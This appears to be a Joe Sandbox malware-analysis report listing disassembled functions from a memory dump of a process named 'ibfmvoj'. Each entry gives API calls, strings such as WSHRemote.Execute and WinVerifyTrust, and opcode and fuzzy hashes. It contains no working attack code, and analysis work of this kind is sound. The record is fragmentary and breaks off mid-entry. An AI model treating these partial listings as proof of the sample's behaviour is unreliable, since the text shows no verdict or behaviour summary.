                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastPathTemp$ByteCharCloseHandleMultiWide
                                                                                                                                                • String ID: wsh
                                                                                                                                                • API String ID: 4111154415-3917767832
                                                                                                                                                • Opcode ID: 43af52893c9256608d63898f5483cb01fc1c7ebab9671ab4412f3dd768710232
                                                                                                                                                • Instruction ID: ee9b4e6781d47de53901d87de5e5c9b4ef7e75ffa30ca1c7b3c71ef8b3bac4e7
                                                                                                                                                • Opcode Fuzzy Hash: 43af52893c9256608d63898f5483cb01fc1c7ebab9671ab4412f3dd768710232
                                                                                                                                                • Instruction Fuzzy Hash: 13819021B4878246E765EF22AC4023AA6E4FF48BA4F845135DD4FA7B94DF3CF55182A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Free$DefaultLanguageLoadVersion$FindInfoLocalePathResourceSearchSystemUser_wcsncoll
                                                                                                                                                • String ID: %s\%s$MUI
                                                                                                                                                • API String ID: 4051804633-2651373239
                                                                                                                                                • Opcode ID: 8ba841149439af4d1bddf59d917fa73db4130d6cf2da4477b3a80215aec19422
                                                                                                                                                • Instruction ID: 41d05dc2575b6a504823e2baaa4f35f4d1c0253750894362f010b438f43d30b2
                                                                                                                                                • Opcode Fuzzy Hash: 8ba841149439af4d1bddf59d917fa73db4130d6cf2da4477b3a80215aec19422
                                                                                                                                                • Instruction Fuzzy Hash: F7D17051B1C68692EA66EE559C10AB9D291EF04FE4F840432FD4F97B88DF3CF51582A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                                                                                                                • String ID: Path$ScriptFile
                                                                                                                                                • API String ID: 3760252266-3888212790
                                                                                                                                                • Opcode ID: 5f9a9f18898cb667536f3997294d2a5b0bf70923a7b9e8a82c859b85847d0031
                                                                                                                                                • Instruction ID: e44a07ac657479a38d8c16f71d50374ad6d9703badbb08dee368d8e4e3d31055
                                                                                                                                                • Opcode Fuzzy Hash: 5f9a9f18898cb667536f3997294d2a5b0bf70923a7b9e8a82c859b85847d0031
                                                                                                                                                • Instruction Fuzzy Hash: 4971E432608B8182D761EF21AC405AAF3A5FB44BB4F844235EADE97B94CF3CE164C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969BB
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969C9
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96A01
                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00007FF7C0B96B05
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B27
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLocal$AllocByteCharErrorFormatLastMessageMultiStringWide
                                                                                                                                                • String ID: WSHRemote.Execute
                                                                                                                                                • API String ID: 1576816494-1341764647
                                                                                                                                                • Opcode ID: ffd1c503382e88e5e3f823932d5f50387db5542b11f5a48d8d5ae937d63ab8a6
                                                                                                                                                • Instruction ID: f5395b538c1fb80079f779f807bf0b63a06a1b113fc1595a1f487bc08e02a478
                                                                                                                                                • Opcode Fuzzy Hash: ffd1c503382e88e5e3f823932d5f50387db5542b11f5a48d8d5ae937d63ab8a6
                                                                                                                                                • Instruction Fuzzy Hash: 1D519632708B8286E724DF25AC4026AB7E5FB447B4B444639EA9F87F98DF3CE0508750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                                                                                                                • String ID: Options
                                                                                                                                                • API String ID: 1820523601-529056539
                                                                                                                                                • Opcode ID: aafc30660be3989b7c677a723431278c8b586d3f44f073ea2de56a761cd41acf
                                                                                                                                                • Instruction ID: e431051476c382332d726903f51ef08369ccb861a38ea046e8873fd3d47e9a6b
                                                                                                                                                • Opcode Fuzzy Hash: aafc30660be3989b7c677a723431278c8b586d3f44f073ea2de56a761cd41acf
                                                                                                                                                • Instruction Fuzzy Hash: 9751A432608B8182D725EF21AC4056AB395FB45BB4B844335EEAE97BD4DF3CE065C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 443336949-0
                                                                                                                                                • Opcode ID: 028f28adc3d604a2775b557c643c268d49e15f65d77c04e2609fd8a3dfd66380
                                                                                                                                                • Instruction ID: 073b8deb09d3114fc9ccfad9c6b788fc329d758d0d8a2a1a9af86e3bf9bf1f90
                                                                                                                                                • Opcode Fuzzy Hash: 028f28adc3d604a2775b557c643c268d49e15f65d77c04e2609fd8a3dfd66380
                                                                                                                                                • Instruction Fuzzy Hash: E241A021A08A8285EB65EF21AC443B9A6A0FB55779FC40335D66FCABD4CF3CF5158360
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFullPathNameW.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0AD5
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0AE3
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,00000000,00000104,00000104,00007FF7C0B9D3CC), ref: 00007FF7C0BA0B1A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorFullLastMultiNamePathWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1285381999-0
                                                                                                                                                • Opcode ID: 804bdb2c6a16e6dbf445d7e938d7e4f358934b16472f3108d679ff835b2cda5a
                                                                                                                                                • Instruction ID: de121b104641af766b0b12b4e14a49c03b79dc146403076ec2594615b65baf9b
                                                                                                                                                • Opcode Fuzzy Hash: 804bdb2c6a16e6dbf445d7e938d7e4f358934b16472f3108d679ff835b2cda5a
                                                                                                                                                • Instruction Fuzzy Hash: 2B419332A08B8186E721DF21AC4056AB6A5FB447B4F944335EA5A87BD4DF3CE5618350
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoad$ErrorLast
                                                                                                                                                • String ID: MUI
                                                                                                                                                • API String ID: 4223540915-1339004836
                                                                                                                                                • Opcode ID: ee440cfde5a40ed86de3bdb70f8ca0b02737172c3f366c1fdf687691d9491939
                                                                                                                                                • Instruction ID: e12a46a4e3532ce83c0f3fc681c757db86811963c397f8dbcad495515be6e38b
                                                                                                                                                • Opcode Fuzzy Hash: ee440cfde5a40ed86de3bdb70f8ca0b02737172c3f366c1fdf687691d9491939
                                                                                                                                                • Instruction Fuzzy Hash: 95218D21B09A4241FFA7EF19ED1413592A1AF48BA4F945435CB0F87B54DF3CF8668360
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4104442557-0
                                                                                                                                                • Opcode ID: d5f154a875e1f0608891e15b4576a9b2a311f5baa3c67677897c00686b334d0e
                                                                                                                                                • Instruction ID: 2a98de3cec2367c38729e4f7283c6fcc1e8a46f5a766ce2f6ac32200fc257a20
                                                                                                                                                • Opcode Fuzzy Hash: d5f154a875e1f0608891e15b4576a9b2a311f5baa3c67677897c00686b334d0e
                                                                                                                                                • Instruction Fuzzy Hash: 5F112121A05F428ADB01EF71EC450A973A4FB49768B801A35EA6E83B54EF3CE5758390
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BindCreateDefaultUser_malloc_dbg
                                                                                                                                                • String ID: WSH$WScript
                                                                                                                                                • API String ID: 2109471750-1019903269
                                                                                                                                                • Opcode ID: 7cdb09a521cc4e122bc585dc87989b5881d3b94ddf221384a86a570e6912439e
                                                                                                                                                • Instruction ID: 6c9f0074255225f7b7269c73512244d1e84550d0d7e56f67e88623ba7cf382d7
                                                                                                                                                • Opcode Fuzzy Hash: 7cdb09a521cc4e122bc585dc87989b5881d3b94ddf221384a86a570e6912439e
                                                                                                                                                • Instruction Fuzzy Hash: 0F023D26B08B5686EB55DF69D890169B370FB48F94B844036CE0E87B64DF3DE465C390
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: WScript.CreateObject
                                                                                                                                                • API String ID: 0-1366894974
                                                                                                                                                • Opcode ID: 008792f5e162dc5d3a9b384b9b4e046247bced2e29afe3130450b502360bdb38
                                                                                                                                                • Instruction ID: 407234e1a60b6ffe1b494079d41c1c9639948886a6d52c9a711de4231b39d4c7
                                                                                                                                                • Opcode Fuzzy Hash: 008792f5e162dc5d3a9b384b9b4e046247bced2e29afe3130450b502360bdb38
                                                                                                                                                • Instruction Fuzzy Hash: 47A15A66718A8681EA15EF1AD890279A370FB84FA4F945032EE0F87764DF3CF455C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$AllocBindByteCreateFree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3716443497-0
                                                                                                                                                • Opcode ID: af0a492460ef6d514494ad7fdd4927a935bcce2d0a4bdd5fb251437fca3461da
                                                                                                                                                • Instruction ID: 986bd6e85cff8f1351d0a3e66c912621c26e8835035851df463e64064c121b44
                                                                                                                                                • Opcode Fuzzy Hash: af0a492460ef6d514494ad7fdd4927a935bcce2d0a4bdd5fb251437fca3461da
                                                                                                                                                • Instruction Fuzzy Hash: B9414032B44A1686EB15DF66D8503AD63B0EB48FA9F404036CE0E97B54DF7DE456C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Delete$Close$OpenString$FreeType$LoadQueryRegisterValue_vsnprintfsprintf_sstrcmp
                                                                                                                                                • String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
                                                                                                                                                • API String ID: 2408362525-1178591435
                                                                                                                                                • Opcode ID: 1a7804dd676ee839003af73902d4650a243e9882f2b3694fbbe909cdd1bccacf
                                                                                                                                                • Instruction ID: 331a3c181e6e61f3c0e6d8a4794be51818874551c4f0a4dbb2a113f3c959efb0
                                                                                                                                                • Opcode Fuzzy Hash: 1a7804dd676ee839003af73902d4650a243e9882f2b3694fbbe909cdd1bccacf
                                                                                                                                                • Instruction Fuzzy Hash: 87E12036B08B4682EB01EF65DC94169A3B1FB84FA4F904032DA4E87B68DF7DE455C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96816
                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96829
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96838
                                                                                                                                                • swprintf_s.MSVCRT ref: 00007FF7C0B96863
                                                                                                                                                • FormatMessageA.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96877
                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96888
                                                                                                                                                • sprintf_s.MSVCRT ref: 00007FF7C0B968A6
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B968C3
                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B968DC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96903
                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00007FF7C0B96915
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96927
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000104,00007FF7C0B9DD3F), ref: 00007FF7C0B96936
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                                                                                                                                • String ID: 0x%8X$0x%8X
                                                                                                                                                • API String ID: 1583499379-4147741067
                                                                                                                                                • Opcode ID: c5a85885311cf4042d3cf8e089c4a7487ab9d558c7754ad68e0d695b610d4354
                                                                                                                                                • Instruction ID: 57eadbc855561dd243636b2156e87bc12b31fc50bd982c89a85689aeb341702e
                                                                                                                                                • Opcode Fuzzy Hash: c5a85885311cf4042d3cf8e089c4a7487ab9d558c7754ad68e0d695b610d4354
                                                                                                                                                • Instruction Fuzzy Hash: 2A419232B09B1286E715EF21AC44579A7A5FF48BA4B84413ADD4F83B54DF3CF4568390
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$ErrorLastmemset$CloseDirectoryFreeHandleLibrarySystemwcsrchr
                                                                                                                                                • String ID: $WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
                                                                                                                                                • API String ID: 1667831668-3174228240
                                                                                                                                                • Opcode ID: f44232b6c4acef3f1758b81b054faaf4af62f7febe82bdf01971c056996aea97
                                                                                                                                                • Instruction ID: 934a55041fc7ccf3a91e1642f80210dee8b3108571d05fe861322f970146c87a
                                                                                                                                                • Opcode Fuzzy Hash: f44232b6c4acef3f1758b81b054faaf4af62f7febe82bdf01971c056996aea97
                                                                                                                                                • Instruction Fuzzy Hash: 70614B32A18B5286E701EF65E88026EB7B0FB84764F904035EE4B97B58DF3CE455CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$Clear$Heap$AllocArrayChangeElementFreeProcessSafeStringType
                                                                                                                                                • String ID: null
                                                                                                                                                • API String ID: 915209209-634125391
                                                                                                                                                • Opcode ID: 98e48d5cb1498143d75f1ca6c8df7f96c020fd9b64a28909cffdce2a388d37b5
                                                                                                                                                • Instruction ID: 14d775712410ca8502e7c0f01d088b454fac31339723f722bd0ba6910dd268ee
                                                                                                                                                • Opcode Fuzzy Hash: 98e48d5cb1498143d75f1ca6c8df7f96c020fd9b64a28909cffdce2a388d37b5
                                                                                                                                                • Instruction Fuzzy Hash: 85516D22B14A5286EB12EF65DC545A967B0FF44BB8F800435DE0E97B98EF38F455C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseMessage$CurrentDispatchThread
                                                                                                                                                • String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                • API String ID: 161541553-3078226056
                                                                                                                                                • Opcode ID: 5cf0ade7f280740e5f0efe1e6f24d2458c7bbc4dcc6469048af84908b933bf4f
